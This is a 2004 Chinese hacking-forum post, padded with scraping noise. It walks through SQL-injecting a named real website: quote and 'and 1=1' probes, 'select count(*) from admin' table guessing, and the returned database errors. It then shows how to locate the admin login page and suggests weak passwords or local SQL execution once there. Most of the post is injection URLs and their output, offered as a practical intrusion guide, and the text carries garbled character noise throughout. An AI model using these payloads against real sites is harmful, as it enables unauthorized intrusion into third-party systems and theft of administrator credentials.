- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版8 y& w! F9 \& Y5 d3 x7 U4 x# Q a# O0 Z
6 n- X! ~: g3 I8 B
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?& ^/ Q J) j3 t% y
+ b; k+ g2 |/ y, L, t分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。 m3 T2 h) C6 ]$ P9 P7 |* o" |" x
. J" d* ~+ N* L0 j, F$ j
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。+ V7 L( l% o7 {, ~. \6 K
+ |( [" ?$ ?3 [. Z( j这里我简单的介绍一个过程吧。+ `+ [. H. }- X8 e/ M
* l9 k- \ C% b! z# ^8 Z# a
首先我找到一个网站,是我们基地首页有连接的
( u: d$ i5 Z& J, V/ N5 mhttp://www.16china.com/hack/
6 J0 x- b* }) {7 `+ v$ M6 `: Q* j" i8 N ]! L
随便选择一个分页:) ^' Y0 h D6 Z9 U" s
http://www.16china.com/hack/SoftView.Asp?SoftID=139
2 c' C- s6 @4 s典型的ASP。看看能不能注射3 c. j6 O9 [/ f) [7 m
http://www.16china.com/hack/SoftView.Asp?SoftID=139'
+ k$ n1 O* ]- `- H# Z返回:
+ v8 V/ h4 M& Y ?Microsoft VBScript 编译器错误 错误 '800a03f6' " e1 v# f. ~, D m" X6 [
! K q g1 D+ R7 u
缺少 'End' ) a# I, N0 ] L8 _) k" I. l2 G
% `% j* ~8 d l3 G9 p
/iisHelp/common/500-100.asp,行242 . _ Y6 ?+ @2 f- J2 E7 q. z# @
* c5 l1 Y9 E+ F3 m+ Z% d9 Z5 ?
Microsoft JET Database Engine 错误 '80040e14' ' U* T, Y M0 t
) o7 o6 S( w7 e$ b字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 $ c$ M0 a: [' H
4 `0 q9 z/ H: Q) l/ d# c6 M# Y
/hack/SoftView.Asp,行17
. g* ~0 @5 e4 S. \再来:
# m9 _4 V8 l: P/ Q+ p% T+ Ohttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
$ \6 W1 `, x& l- w: \6 p返回正常网页。& U% X' T' b N0 O
8 X5 x, S, n, u9 Y8 q提交:. a; ^- _* T6 w. d+ A" F
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0: H- {9 v: s0 f0 i
* v2 W3 \8 A% A2 ^9 c返回正常页/, W1 P( J9 `" y
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0: }8 }' w- V0 k0 ^
5 P# F, D- B8 T$ H7 d; h
同样正常。' R& E+ ?0 A& I+ t4 a
& a) t# n1 C7 [( Jhttp://www.16china.com/hack/Soft ... )%20from%20article)>=0
9 ^% c! ]4 v" R
0 D" |) o9 N, R; f0 \" o6 E# g……
& o8 ^$ G+ ~' a% X7 r7 E9 J
8 ^3 T4 P& e3 V0 N4 N' {7 T4 _象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
% D/ c6 [3 V0 s9 Y按以往的经验我采用:, M+ {% {% w3 W/ a; m: x) p' o4 O
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
8 k4 ` x" [& V5 J- F2 N& U我为什么不用http://www.16china.com/hack/admin.asp. H) m, T) |, \9 N7 q3 q
http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
! c& N8 M! C3 \( I6 y' }# p1 B# ^http://www.16china.com/hack/admin返回信息:
% e, `/ H9 Y8 L6 P9 N2 B- C错误提示信息! + o5 U6 ^# V' l9 s3 o# R) q; Q: x
产生错误的可能原因:
7 H+ N& Q! y; } u. ?; U. t: a$ ]/ y% ^
r" L" m7 v A$ G q您没有进入本页面的权限!本次操作已被记录!: }+ P/ u3 Z# T7 Q/ l9 x" x: t
可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.
- c% A& n# Q) c/ d6 h5 A本页面为[管理员]专用,请先登陆后进入.7 V9 k& p, ^. u5 F& v6 q, M
; t; L/ I7 `( i' G/ d B
返回上一页... /*说明登陆URL为常用的如:index.asp...*/
. l+ x0 {$ r+ k3 q查看HTML代码:0 z6 c% R$ `* E
<html><head><title>错误提示信息!</title>
, g5 H4 o& M. ]; c# w8 H
& h* K* c+ y2 P- U3 }……
2 w* a) V+ |! f$ k+ w; D) S
9 n2 b0 g+ K- x' O8 O' B( D<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.
8 k. C5 T S3 ]; m" |% f3 S3 W……8 \. f0 g6 r4 ~8 C! n
) l! b/ C7 v) U0 H3 o8 i1 s
找到了:
' ], B+ Q2 R# o5 o" xhttp://www.16china.com/hack/admin/adminlogin.asp+ `( E5 M: W8 m5 r4 c# q0 H' E
! y; N9 [5 z: Z/ }; f3 M9 w$ r6 R a! h: t# x4 o
看看他的源代码告诉我们些什么:
6 M: t) d! \6 E. I: ]& b6 c! _; D4 r6 L
<html>
6 [& Z! z& N5 Y8 Z4 X3 @8 P, F5 y* O8 C0 z4 L7 ~
<head>
) o/ R4 x {+ E0 l4 I<title>管理员登陆</title>
) u+ D/ f D/ ~% o- M1 i6 K0 v# T4 I. d/ h; c
……………
* R7 ~9 \& F, o, A( p! s4 Z3 m. p% X0 K' I8 G
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入% z6 ]/ Z# {2 u: i. @* N
http://www.16china.com/hack/admin/adminlogin.asp?action=login* b* u. X9 H& a6 B* K1 ^7 m) Y7 T( P
这里。% {. J% P( \$ d u) j
' W) Y* O, Z9 H; p3 _8 b
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
& X7 F, F; v7 h
- l: `5 Q6 @( z9 w% D2 }懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
